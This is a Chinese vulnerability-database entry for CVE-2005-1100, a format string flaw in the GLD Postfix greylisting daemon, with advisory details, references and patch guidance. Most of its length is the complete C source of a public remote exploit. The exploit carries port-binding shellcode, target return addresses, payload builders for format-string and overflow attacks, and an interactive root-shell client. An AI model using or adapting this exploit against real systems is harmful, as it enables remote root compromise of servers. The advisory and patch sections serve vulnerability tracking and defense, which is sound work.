CVE-2005-1100
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:17:10
NMCOES    

[原文]Format string vulnerability in the ErrorLog function in cnf.c in Greylisting daemon (GLD) 1.3 and 1.4 allows remote attackers to execute arbitrary code via format string specifiers in data that is passed directly to syslog.


[CNNVD]Salim Gasmi GLD Postfix Greylisting Daemon格式化字符串漏洞(CNNVD-200505-301)

        Greylisting daemon (GLD) 1.3和1.4版本的cnf.c中的ErrorLog函数含有格式化字符串漏洞,远程攻击者可以通过直接传送给syslog的数据中含有的格式化字符串限定符来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:salim_gasmi:gld:1.4
cpe:/a:salim_gasmi:gld:1.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1100
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1100
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-301
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111339935903880&w=2
(UNKNOWN)  BUGTRAQ  20050412 GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
http://security.gentoo.org/glsa/glsa-200504-10.xml
(PATCH)  GENTOO  GLSA-200504-10
http://securitytracker.com/alerts/2005/Apr/1013678.html
(UNKNOWN)  SECTRACK  1013678
http://xforce.iss.net/xforce/xfdb/20067
(UNKNOWN)  XF  gld-cnfc-format-string(20067)

- 漏洞信息

Salim Gasmi GLD Postfix Greylisting Daemon格式化字符串漏洞
高危 格式化字符串
2005-05-02 00:00:00 2006-09-05 00:00:00
远程  
        Greylisting daemon (GLD) 1.3和1.4版本的cnf.c中的ErrorLog函数含有格式化字符串漏洞,远程攻击者可以通过直接传送给syslog的数据中含有的格式化字符串限定符来执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.gasmi.net/down/gld-1.5.tgz

- 漏洞信息 (934)

gld 1.4 (Postfix Greylisting Daemon) Remote Format String Exploit (EDBID:934)
linux remote
2005-04-13 Verified
2525 Xpl017Elz
N/A [点击下载]
/*
**
**
** 0x82-meOw-linuxer_forever - gld 1.4 remote overflow format string exploit.
** (c) 2005 Team INetCop Security.
**
** Nickname of this code is,
** `Kill two bird with one stone.' or, `One shot, two kill!.'
** hehehe ;-D
**
** Advisory URL: 
** http://x82.inetcop.org/h0me/adv1sor1es/INCSA.2005-0x82-026-GLD.txt
**
** It's as well as RedHat Linux and to gentoo, debian Linux, *BSD.
** You can develop for your flatform.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
**
** P.S: My domain x82.i21c.net encountered compulsion withdrawal from the country.
** They are killing many hackers of the Korea. hehehe ;-p
**
*/
/*
**
** These days, the main issue that strikes Korea is small rocky island "Dokdo".
** You can get more detailed information from following websites.
**
** "Japanese goverment has to follow and learn from German goverment"
**
** I can confidently say "Dokdo is belong to Korea".
**
** (1) reference 
**
** 1) Their claim that the East Sea has some historical precedent worked,
** as some major book and map publishers, educational web sites and other
** reference materials now include the East Sea name along with the Sea of Japan.
** - worldatlas.com-
**
** http://www.worldatlas.com/webimage/countrys/asia/eastsea.htm
**
** 2) On historical perspective and in international law, why there
** is no valid dispute over the ownership of Dokdo.
**
** http://www.prkorea.com/english/textbook/ge03.html
**
** 3)Truth in scholarship
**
** http://www.prkorea.com/english/textbook/maintruth.html
**
**
*/

#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEF_HOST "localhost"
#define PORT 2525

struct os_t {
int number;
char *os_type;
unsigned long dtors_addr;
unsigned long shell;
int sflag;
};

struct os_t platform[]={
{
0,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (format string exploit)",
0x0804db98,0xbfffa3bc,15
},
{
1,"Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)",
0x0804d14c,0x0805506e,15
},
{
2,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (buffer overflow exploit)",
0,0xbfffa5d8,300
},
{
/* jmp *%esp method */
3,"Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)",
0,0x4212c5eb,254
},
{
4,NULL,0,0,0
}
};

int __debug_chk=0;
char t_atk[0xfff*3];
// This is lovable shellcode, that's sweet in linux platform. 
char shellcode[]= /* portshell shellcode, 128 bytes (tcp/36864) */
"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89"
"\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89"
"\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89"
"\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66"
"\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80"
"\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";

void banrl();
int make_bof_code(unsigned long shell,int size,int type);
int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag);
int setsock(char *host,int port);
void usage(char *args);
void re_connt(int sock);
void conn_shell(int sock);

int main(int argc,char *argv[])
{
int sock,type=0;
int port=(PORT);
char host[256]=DEF_HOST;

int sflag=platform[type].sflag;
unsigned long retloc=platform[type].dtors_addr;
unsigned long shell=platform[type].shell;

(void)banrl();
while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) {
extern char *optarg;
switch(sock) {
case 'D':
case 'd':
__debug_chk=1;
break;
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
shell=strtoul(optarg,NULL,0);
break;
case 'F':
case 'f':
sflag=atoi(optarg);
break;
case 'H':
case 'h':
memset((char *)host,0,sizeof(host));
strncpy(host,optarg,sizeof(host)-1);
break;
case 'T':
case 't':
type=atoi(optarg);
if(type>=4){
(void)usage(argv[0]);
} else {
retloc=platform[type].dtors_addr;
shell=platform[type].shell;
sflag=platform[type].sflag;
}
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case '?':
fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}

fprintf(stdout," #\n # target host: %s:%d\n",host,port);
fprintf(stdout," # type: %s\n",platform[type].os_type);
switch(type)
{
case 0:
case 1:
(int)make_fmt_code(retloc,shell,sflag);
break;
case 2:
(int)make_bof_code(shell,sflag,0);
break;
case 3:
(int)make_bof_code(shell,sflag,1);
}

fprintf(stdout," # send code size: %d byte\n",strlen(t_atk));
sock=setsock(host,port);
(void)re_connt(sock);

if(__debug_chk) sleep(10);

send(sock,t_atk,strlen(t_atk),0);
close(sock);

fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host);
sleep(1);
sock=setsock(host,36864);
(void)re_connt(sock);

fprintf(stdout," # connected to %s:36864 !\n #\n\n",host);
(void)conn_shell(sock);
}

int make_bof_code(unsigned long shell,int size,int type)
{
int a,b;
char nop_shell[8192];
char code_buf[4096];

memset((char *)nop_shell,0,sizeof(nop_shell));
memset((char *)code_buf,0,sizeof(code_buf));
memset((char *)t_atk,0,sizeof(t_atk));

switch(type)
{
case 0:
fprintf(stdout," # method: normal overflow exploit: %d byte\n",size);
/* sender buffer = nop, shellcode */
for(a=0;a<1000-strlen(shellcode);a++)
nop_shell[a]='N';
for(b=0;b<strlen(shellcode);b++)
nop_shell[a++]=shellcode[b];
/* client_address = retaddr */
for(b=0;b<size*4;b+=4)
*(long *)&code_buf[b]=shell;

snprintf(t_atk,sizeof(t_atk)-1,
"sender=%s\r\n"
"client_address=%s\r\n\r\n",nop_shell,code_buf);
break;

case 1:
fprintf(stdout," # method: jmp *%%esp exploit: %d byte\n",size);
/* sender buffer */
for(a=0;a<1000;a++)
nop_shell[a]='N';
/* client_address buffer */
for(b=0;b<size*4;b+=4)
*(long *)&code_buf[b]=0x82828282;
/* ebp */
*(long *)&code_buf[b]=0x41414141;
b+=4;
/* eip (jmp *%esp) */
*(long *)&code_buf[b]=(shell);
b+=4;
/* jmp nop (0xeb,0x08) */
*(long *)&code_buf[b]=0x08eb08eb;
b+=4;
/* dummy, nop */
// 0x0804d280 0xbfffe1c8 0x08049521
*(long *)&code_buf[b]=0x0804d280;
b+=4;
*(long *)&code_buf[b]=0x90909090;//0xbfffe1c8;
b+=4;
*(long *)&code_buf[b]=0x90909090;//0x08049521;
b+=4;
*(long *)&code_buf[b]=0x90909090;
b+=4;
/* shellcode */
for(a=0;a<strlen(shellcode);a++)
code_buf[b++]=shellcode[a];

snprintf(t_atk,sizeof(t_atk)-1,
"sender=%s\r\n"
"client_address=%s\r\n\r\n",nop_shell,code_buf);
}
}

int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag)
{
unsigned char header[256];
unsigned char nop_shell[8192];
int a,b,c,d,e,f;
int addr1,addr2,addr3,addr4;
a=b=c=d=e=f=addr1=addr2=addr3=addr4=0;

memset((char *)header,0,sizeof(header));
memset((char *)nop_shell,0,sizeof(nop_shell));
memset((char *)t_atk,0,sizeof(t_atk));

fprintf(stdout," # Make format string, .dtors: %p\n",retloc);

*(long *)&header[0]=retloc+0;
*(long *)&header[4]=retloc+1;
*(long *)&header[8]=retloc+2;
*(long *)&header[12]=retloc+3;

a=(shell>>24)&0xff;
addr1=(shell>>24)&0xff;
b=(shell>>16)&0xff;
addr2=(shell>>16)&0xff;
c=(shell>>8)&0xff;
addr3=(shell>>8)&0xff;
d=(shell>>0)&0xff;
addr4=(shell>>0)&0xff;

if((addr4-16-65)<10)d+=0x100;
if((addr3-addr4)<10)c+=0x100;
if((addr2-addr3)<10)b+=0x100;

for(e=0;e<320-strlen(shellcode);e++)
nop_shell[e]='N';
for(f=0;f<strlen(shellcode);f++)
nop_shell[e++]=shellcode[f];

fprintf(stdout," #\n # shellcode addr: %p, size: %d byte\n",shell,strlen(nop_shell));
snprintf(t_atk,sizeof(t_atk)-1,
"client_address=%s" /* header */
"%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n" /* fmt code */
"%s\r\n\r\n", /* shellcode */
header,d-16-65,(sflag+0),c-addr4,(sflag+1),b-addr3,
(sflag+2),0x100+a-addr2,(sflag+3),nop_shell);
}

void re_connt(int sock)
{
if(sock==-1)
{
fprintf(stdout," #\n # Failed.\n");
fprintf(stdout," # Happy Exploit ! :-)\n #\n\n");
exit(-1);
}
}

int setsock(char *host,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82_addr;

if((he=gethostbyname(host))==NULL)
{
herror(" # gethostbyname() error");
return(-1);
}

if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
{
perror(" # socket() error");
return(-1);
}

x82_addr.sin_family=AF_INET;
x82_addr.sin_port=htons(port);
x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
bzero(&(x82_addr.sin_zero),8);

if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
{
perror(" # connect() error");
return(-1);
}
return(sock);
}

void conn_shell(int sock)
{
int pckt;
char *cmd="uname -a;id;export TERM=vt100;exec bash -i\n";
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,1024);

fprintf(stdout," #\n # Kill two bird with one stone!\n");
fprintf(stdout," # OK, It's Rootshell\n #\n\n");
send(sock,cmd,strlen(cmd),0);

while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);

if(FD_ISSET(sock,&rset))
{
pckt=read(sock,rbuf,1024);
if(pckt<=0)
{
fprintf(stdout," #\n # Happy Exploit !\n #\n\n");
exit(0);
}
rbuf[pckt]=0;
printf("%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pckt=read(STDIN_FILENO,rbuf,1024);
if(pckt>0)
{
rbuf[pckt]=0;
write(sock,rbuf,pckt);
}
}
}
return;
}

void banrl()
{
fprintf(stdout,"\n #\n # 0x82-meOw_linuxer_forever - 
Greylisting daemon for Postfix remote exploit\n");
fprintf(stdout," # szoahc(at)hotmail(dot)com\n #\n\n");
}

void usage(char *args)
{
int i;
fprintf(stdout," Usage: %s -options arguments\n\n",args);
fprintf(stdout,"\t-r [retloc] - .dtors address.\n");
fprintf(stdout,"\t-s [shell] - shellcode address.\n");
fprintf(stdout,"\t-f [flag num] - $-flag count.\n");
fprintf(stdout,"\t-h [host] - target hostname.\n");
fprintf(stdout,"\t-t [type num] - target number.\n");
fprintf(stdout,"\t-i - help information.\n\n");

fprintf(stdout," - Target Type Number List -\n\n");
for(i=0;platform[i].os_type!=NULL;i++)
{
fprintf(stdout," {%d} : %s\n",i,platform[i].os_type);
}
fprintf(stdout,"\n Example: %s -t 0 -h localhost\n",args);
fprintf(stdout," Example: %s -r 0x82828282 -s 0x82828282 -f 15\n\n",args);
exit(0);
}

// milw0rm.com [2005-04-13]
		

- 漏洞信息

15493
GLD gld.conf Format String
Local Access Required, Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

GLD contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when user-supplied data from gld.conf is not properly validated and is passed to a syslog() call without the appropriate format string specifier. This flaw may lead to a loss of Confidentiality, Integrity and/or Availability.

- 时间线

2005-04-12 Unknow
2005-04-13 Unknow

- 解决方案

Upgrade to version 1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Salim Gasmi GLD Postfix Greylisting Daemon Format String Vulnerability
Input Validation Error 13133
Yes No
2005-04-12 12:00:00 2009-07-12 12:56:00
"dong-hun you" <xploit@hackermail.com> disclosed this vulnerability.

- 受影响的程序版本

Salim Gasmi GLD 1.4
+ Gentoo Linux
Salim Gasmi GLD 1.3.1
Salim Gasmi GLD 1.3
Salim Gasmi GLD 1.2
Salim Gasmi GLD 1.1
Salim Gasmi GLD 1.0
Salim Gasmi GLD 1.5
+ Gentoo Linux

- 不受影响的程序版本

Salim Gasmi GLD 1.5
+ Gentoo Linux

- 漏洞讨论

It is reported that GLD contains a format string vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input data prior to using it in a formatted-printing function.

Remote attackers may exploit this vulnerability to cause arbitrary machine code to be executed in the context of the affected service. As the service is designed to be run as the superuser, remote attackers may gain superuser privileges on affected computers.

GLD version 1.4 is reportedly affected, but prior versions may also be affected.

- 漏洞利用

A proof of concept exploit was provided by "you dong-hun"(Xpl017Elz) &lt;szoahc@hotmail.com&gt;:

- 解决方案

Gentoo Linux has released advisory GLSA 200504-10 dealing with this and other issues. Gentoo advises that all users update their packages by carrying out the following commands with superuser privileges:

emerge --sync
emerge --ask --oneshot --verbose ">=mail-filter/gld-1.5"

For more information, please see the referenced Gentoo Linux advisory.

The vendor, Salim Gasmi, has released an upgrade resolving these issues.


Salim Gasmi GLD 1.0

Salim Gasmi GLD 1.1

Salim Gasmi GLD 1.2

Salim Gasmi GLD 1.3

Salim Gasmi GLD 1.3.1

Salim Gasmi GLD 1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站